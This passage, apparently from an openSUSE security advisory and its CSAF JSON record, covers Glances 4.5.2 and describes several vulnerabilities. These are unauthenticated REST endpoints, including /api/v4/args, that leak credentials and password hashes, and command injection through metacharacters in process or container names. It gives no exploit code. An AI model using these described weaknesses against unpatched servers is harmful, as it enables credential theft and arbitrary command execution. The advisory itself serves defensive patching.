|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
12 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
12 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
9.1 (Critical)
Affected products
Recommended
12 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
critical
Affected products
Recommended
12 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
moderate
Affected products
Recommended
12 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
critical
Affected products
Recommended
12 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
References
26 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "glances-common-4.5.2-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the glances-common-4.5.2-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2026-10415",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2026_10415-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-32596 page",
"url": "https://www.suse.com/security/cve/CVE-2026-32596/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-32608 page",
"url": "https://www.suse.com/security/cve/CVE-2026-32608/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-32609 page",
"url": "https://www.suse.com/security/cve/CVE-2026-32609/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-32610 page",
"url": "https://www.suse.com/security/cve/CVE-2026-32610/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-32611 page",
"url": "https://www.suse.com/security/cve/CVE-2026-32611/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-32632 page",
"url": "https://www.suse.com/security/cve/CVE-2026-32632/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-32633 page",
"url": "https://www.suse.com/security/cve/CVE-2026-32633/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-32634 page",
"url": "https://www.suse.com/security/cve/CVE-2026-32634/"
}
],
"title": "glances-common-4.5.2-1.1 on GA media",
"tracking": {
"current_release_date": "2026-03-24T00:00:00Z",
"generator": {
"date": "2026-03-24T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2026:10415-1",
"initial_release_date": "2026-03-24T00:00:00Z",
"revision_history": [
{
"date": "2026-03-24T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "glances-common-4.5.2-1.1.aarch64",
"product": {
"name": "glances-common-4.5.2-1.1.aarch64",
"product_id": "glances-common-4.5.2-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "python311-Glances-4.5.2-1.1.aarch64",
"product": {
"name": "python311-Glances-4.5.2-1.1.aarch64",
"product_id": "python311-Glances-4.5.2-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "python313-Glances-4.5.2-1.1.aarch64",
"product": {
"name": "python313-Glances-4.5.2-1.1.aarch64",
"product_id": "python313-Glances-4.5.2-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "glances-common-4.5.2-1.1.ppc64le",
"product": {
"name": "glances-common-4.5.2-1.1.ppc64le",
"product_id": "glances-common-4.5.2-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python311-Glances-4.5.2-1.1.ppc64le",
"product": {
"name": "python311-Glances-4.5.2-1.1.ppc64le",
"product_id": "python311-Glances-4.5.2-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python313-Glances-4.5.2-1.1.ppc64le",
"product": {
"name": "python313-Glances-4.5.2-1.1.ppc64le",
"product_id": "python313-Glances-4.5.2-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "glances-common-4.5.2-1.1.s390x",
"product": {
"name": "glances-common-4.5.2-1.1.s390x",
"product_id": "glances-common-4.5.2-1.1.s390x"
}
},
{
"category": "product_version",
"name": "python311-Glances-4.5.2-1.1.s390x",
"product": {
"name": "python311-Glances-4.5.2-1.1.s390x",
"product_id": "python311-Glances-4.5.2-1.1.s390x"
}
},
{
"category": "product_version",
"name": "python313-Glances-4.5.2-1.1.s390x",
"product": {
"name": "python313-Glances-4.5.2-1.1.s390x",
"product_id": "python313-Glances-4.5.2-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "glances-common-4.5.2-1.1.x86_64",
"product": {
"name": "glances-common-4.5.2-1.1.x86_64",
"product_id": "glances-common-4.5.2-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "python311-Glances-4.5.2-1.1.x86_64",
"product": {
"name": "python311-Glances-4.5.2-1.1.x86_64",
"product_id": "python311-Glances-4.5.2-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "python313-Glances-4.5.2-1.1.x86_64",
"product": {
"name": "python313-Glances-4.5.2-1.1.x86_64",
"product_id": "python313-Glances-4.5.2-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "glances-common-4.5.2-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64"
},
"product_reference": "glances-common-4.5.2-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "glances-common-4.5.2-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le"
},
"product_reference": "glances-common-4.5.2-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "glances-common-4.5.2-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x"
},
"product_reference": "glances-common-4.5.2-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "glances-common-4.5.2-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64"
},
"product_reference": "glances-common-4.5.2-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-Glances-4.5.2-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64"
},
"product_reference": "python311-Glances-4.5.2-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-Glances-4.5.2-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le"
},
"product_reference": "python311-Glances-4.5.2-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-Glances-4.5.2-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x"
},
"product_reference": "python311-Glances-4.5.2-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-Glances-4.5.2-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64"
},
"product_reference": "python311-Glances-4.5.2-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-Glances-4.5.2-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64"
},
"product_reference": "python313-Glances-4.5.2-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-Glances-4.5.2-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le"
},
"product_reference": "python313-Glances-4.5.2-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-Glances-4.5.2-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x"
},
"product_reference": "python313-Glances-4.5.2-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-Glances-4.5.2-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
},
"product_reference": "python313-Glances-4.5.2-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-32596",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-32596"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.2, Glances web server runs without authentication by default when started with `glances -w`, exposing REST API with sensitive system information including process command-lines containing credentials (passwords, API keys, tokens) to any network client. Version 4.5.2 fixes the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-32596",
"url": "https://www.suse.com/security/cve/CVE-2026-32596"
},
{
"category": "external",
"summary": "SUSE Bug 1260321 for CVE-2026-32596",
"url": "https://bugzilla.suse.com/1260321"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-32596"
},
{
"cve": "CVE-2026-32608",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-32608"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. The Glances action system allows administrators to configure shell commands that execute when monitoring thresholds are exceeded. These commands support Mustache template variables (e.g., `{{name}}`, `{{key}}`) that are populated with runtime monitoring data. The `secure_popen()` function, which executes these commands, implements its own pipe, redirect, and chain operator handling by splitting the command string before passing each segment to `subprocess.Popen(shell=False)`. Prior to 4.5.2, when a Mustache-rendered value (such as a process name, filesystem mount point, or container name) contains pipe, redirect, or chain metacharacters, the rendered command is split in unintended ways, allowing an attacker who controls a process name or container name to inject arbitrary commands. Version 4.5.2 fixes the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-32608",
"url": "https://www.suse.com/security/cve/CVE-2026-32608"
},
{
"category": "external",
"summary": "SUSE Bug 1260320 for CVE-2026-32608",
"url": "https://bugzilla.suse.com/1260320"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-32608"
},
{
"cve": "CVE-2026-32609",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-32609"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. The GHSA-gh4x fix (commit 5d3de60) addressed unauthenticated configuration secrets exposure on the `/api/v4/config` endpoints by introducing `as_dict_secure()` redaction. However, the `/api/v4/args` and `/api/v4/args/{item}` endpoints were not addressed by this fix. These endpoints return the complete command-line arguments namespace via `vars(self.args)`, which includes the password hash (salt + pbkdf2_hmac), SNMP community strings, SNMP authentication keys, and the configuration file path. When Glances runs without `--password` (the default), these endpoints are accessible without any authentication. Version 4.5.2 provides a more complete fix.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-32609",
"url": "https://www.suse.com/security/cve/CVE-2026-32609"
},
{
"category": "external",
"summary": "SUSE Bug 1259832 for CVE-2026-32609",
"url": "https://bugzilla.suse.com/1259832"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
]
